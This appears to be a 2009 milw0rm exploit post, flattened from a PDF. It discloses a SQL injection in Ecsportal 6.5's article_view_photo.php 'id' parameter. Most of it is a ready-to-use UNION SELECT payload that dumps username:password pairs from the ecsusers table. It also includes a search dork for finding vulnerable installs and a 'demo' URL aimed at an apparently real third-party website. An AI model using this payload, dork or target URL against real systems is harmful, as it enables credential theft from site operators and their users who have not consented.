ecsportal rel 6.5 article_view_photo.php id SQL Injection Vulnerability.pdf

1 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 2 Ecsportal 6.5 − SQL−injection Vulnerability 3 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 4 @~~=======================================~~@ 5 ! ============taRentReXx=============== ! 6 The Indian Hacker 7 @~~=======================================~~@ 8 9 @~~=Author : taRentReXx 10 11 @~~=Email : darkxr00tx@gmail.com 12 13 @~~===============INDIAN=================~~@ 14 15 16 @~~=======================================~~@ 17 @~~=Script : Ecsportal 6.5 18 19 @~~=S.Site : http://www.econtentsys.gr/ 20 21 @~~=Dork : Power with ecsportal rel 6.5 22 @~~=======================================~~@ 23 24 25 @~~=Vul file :article_view_photo.php 26 27 28 @~~=Exploit :− 29 30 31 32 article_view_photo.php?id=−999%20union%20all%20select%201,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54%20from%20ecsusers%20limit%200,1−− 33 34 35 !demo! 36 37 http://www.cretaquarium.gr/article_view_photo.php?id=−999%20union%20all%20select%201,2,3,concat(username,0x3a ,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47,48,49,50,51,52,53,54%20from%20ecsusers%20limit%200,1−− 38 39 40 41 42 @~~=======================================~~@ 43 @~~=======================================~~@ 44 45 Greetz to all muslim brothers. 46 to all indians 47 TO str0ke 48 Page 1/2 ecsportal rel 6.5 article_view_photo.php id SQL Injection Vulnerability taRentReXx 06/01/2009 49 @~~===============INDIAN=================~~@ 50 51 # milw0rm.com [2009−06−01] Page 2/2 ecsportal rel 6.5 article_view_photo.php id SQL Injection Vulnerability taRentReXx 06/01/2009